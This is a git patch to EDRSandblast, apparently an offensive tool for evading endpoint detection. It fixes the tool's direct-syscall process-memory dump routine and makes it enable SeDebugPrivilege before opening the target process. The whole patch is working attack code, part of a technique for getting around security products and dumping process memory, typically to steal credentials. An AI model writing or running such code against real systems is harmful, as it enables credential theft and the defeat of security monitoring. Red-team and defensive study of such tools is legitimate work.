From 77953c60bd75ba172d7ca9b5a45b249ad907c926 Mon Sep 17 00:00:00 2001 From: NK Date: Thu, 2 Nov 2023 22:38:10 -0500 Subject: [PATCH] fix syscall dump method, enable sedebugprivilege --- EDRSandblast/Includes/SyscallProcessUtils.h | 4 +++- .../UserlandBypass/ProcessDumpDirectSyscalls.c | 13 ++++++++++++- 2 files changed, 15 insertions(+), 2 deletions(-) diff --git a/EDRSandblast/Includes/SyscallProcessUtils.h b/EDRSandblast/Includes/SyscallProcessUtils.h index 0d5e2d5..705945b 100644 --- a/EDRSandblast/Includes/SyscallProcessUtils.h +++ b/EDRSandblast/Includes/SyscallProcessUtils.h @@ -10,4 +10,6 @@ PUNICODE_STRING SandGetProcessImage(HANDLE hProcess); DWORD SandGetProcessFilename(PUNICODE_STRING ProcessImageUnicodeStr, TCHAR* ImageFileName, DWORD nSize); -DWORD SandFindProcessPidByName(TCHAR* targetProcessName, DWORD* pPid); \ No newline at end of file +DWORD SandFindProcessPidByName(TCHAR* targetProcessName, DWORD* pPid); + +BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege); \ No newline at end of file diff --git a/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c b/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c index c645c3b..2589d1b 100644 --- a/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c +++ b/EDRSandblast/UserlandBypass/ProcessDumpDirectSyscalls.c @@ -402,7 +402,18 @@ DWORD SandMiniDumpWriteDump(TCHAR* targetProcessName, WCHAR* dumpFilePath) { InitializeObjectAttributes(&ObjectAttributesProcess, NULL, 0, NULL, NULL); CLIENT_ID clientId = { 0 }; clientId.ProcessId = UlongToHandle(targetProcessPID); - + HANDLE hToken; + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) { + _tprintf_or_not(TEXT("[-] Unable to open process token. Error : %lu\n"), GetLastError()); + goto cleanup; + } + if (SetPrivilege(hToken, L"SeDebugPrivilege", TRUE)) { + _tprintf_or_not(TEXT("[+] SeDebugPrivilege enabled\n")); + } + else { + _tprintf_or_not(TEXT("[-] Unable to enable SeDebugPrivilege\n")); + goto cleanup; + } status = NtOpenProcess(&htargetProcess, PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, &ObjectAttributesProcess, &clientId); if (status == STATUS_ACCESS_DENIED) { _tprintf_or_not(TEXT("[-] Syscall process dump failed: access denied error while trying to get an handle on the target process (NtOpenProcesserror 0x%x).\n"), status);